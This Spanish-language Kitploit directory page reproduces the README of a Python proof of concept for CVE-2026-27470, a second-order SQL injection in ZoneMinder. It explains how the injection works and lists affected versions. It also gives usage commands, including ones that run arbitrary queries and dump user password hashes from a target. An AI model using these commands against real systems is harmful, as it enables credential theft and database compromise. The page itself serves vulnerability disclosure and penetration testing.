Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-27470-POC — Python PoC para CVE-2026-27470, inyección SQL autenticada de segundo orden en getNearEvents() (status.php) de ZoneMinder, CVSS 8.8 | Kitploit
Herramientas/GitHubGitHub/d3vn0mi/cve-2026-27470-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubd3vn0mi/cve-2026-27470-poc

CVE-2026-27470-POC

Python PoC para CVE-2026-27470, inyección SQL autenticada de segundo orden en getNearEvents() (status.php) de ZoneMinder, CVSS 8.8

Ver Repositorio
2hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-27470 — PoC de Inyección SQL de Segundo Orden en ZoneMinder

Autor: d3vn0mi | CVSS 8.8 | Autenticado | Requiere Permiso de Eventos

Resumen

CVE-2026-27470 es una vulnerabilidad de inyección SQL de segundo orden en web/ajax/status.php de ZoneMinder — específicamente en la función getNearEvents().

DetalleValor
AfectadoZoneMinder <= 1.36.37 y 1.37.61 – 1.38.0
Corregido en1.36.38 / 1.38.1
TipoInyección SQL de Segundo Orden
Autenticación requeridaSí (cualquier usuario con permiso de Eventos)
CVSS8.8 (Alto)

Cómo Funciona

La vulnerabilidad es una inyección SQL de dos fases (segundo orden):

  1. Fase 1 — Almacenamiento: El atacante renombra un evento (o edita su campo Cause) para que contenga un payload SQL. ZoneMinder utiliza una consulta parametrizada para esta escritura, por lo que el payload se almacena de forma segura en la base de datos — ningún WAF o filtro lo bloquea.

  2. Fase 2 — Disparo: El atacante solicita la entidad nearevents a través de la API de estado. La función getNearEvents() lee el Name/Cause del evento almacenado desde la base de datos y lo concatena directamente en una nueva consulta SQL sin saneamiento, lo que resulta en una inyección SQL.

Debido a que el vector de inyección (datos almacenados) está separado del disparador (una solicitud GET limpia), esto evita la mayoría de las protecciones a nivel de entrada.

Instalación

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-27470-POC.git
cd CVE-2026-27470-POC
pip install -r requirements.txt

Uso

Básico — Extraer Versión de la Base de Datos

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password

Consulta SQL Personalizada

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"

Volcar Todos los Usuarios y Hashes de Contraseñas

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users

Las credenciales se guardan en dumped_creds.txt por defecto.

Guardar Resultados en un Archivo Personalizado

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o loot.txt
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT @@datadir" -o result.txt

Enrutar a Través de un Proxy (Burp / mitmproxy)

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --proxy http://127.0.0.1:8080

Usar el Campo Cause en Lugar de Name

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --field Cause --query "SELECT database()"

Especificar un ID de Evento Manualmente

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --event-id 42

Salida Verbosa / Depuración

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password -v

Opciones

FlagDescripciónValor por defecto
-t, --targetURL del objetivo(requerido)
-u, --usernameNombre de usuario de ZoneMinder(requerido)
-p, --passwordContraseña de ZoneMinder(requerido)
--queryConsulta SQL a ejecutarSELECT VERSION()
--dump-usersVolcar todos los nombres de usuario y hashes de contraseñas
-o, --outputGuardar resultados en un archivodumped_creds.txt
--event-idID de evento a usar como portador de la inyección(auto-detectado)
--fieldCampo de inyección: Name o CauseName
--no-restoreNo restaurar el nombre del evento después de la explotación
--proxyURL del proxy HTTP
--timeoutTiempo de espera de la solicitud en segundos30
-v, --verboseHabilitar registro de depuración

Aviso Legal

Esta herramienta se proporciona únicamente con fines de investigación de seguridad educativa y autorizada. No la utilices contra sistemas que no poseas o para los que no tengas permiso explícito por escrito para realizar pruebas. Los autores no son responsables de ningún uso indebido o daño causado por esta herramienta.

Referencias

  • Sitio Oficial de ZoneMinder
  • Repositorio de GitHub de ZoneMinder
Descargar herramienta